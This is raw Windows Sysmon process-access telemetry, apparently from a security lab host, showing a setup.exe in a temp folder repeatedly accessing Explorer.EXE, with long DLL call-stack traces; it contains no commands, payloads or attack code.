13:59:52.708{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015627Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015626Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015625Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015624Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015623Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015622Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015621Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015620Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015619Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015618Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015617Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000015616Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015615Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.692{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\A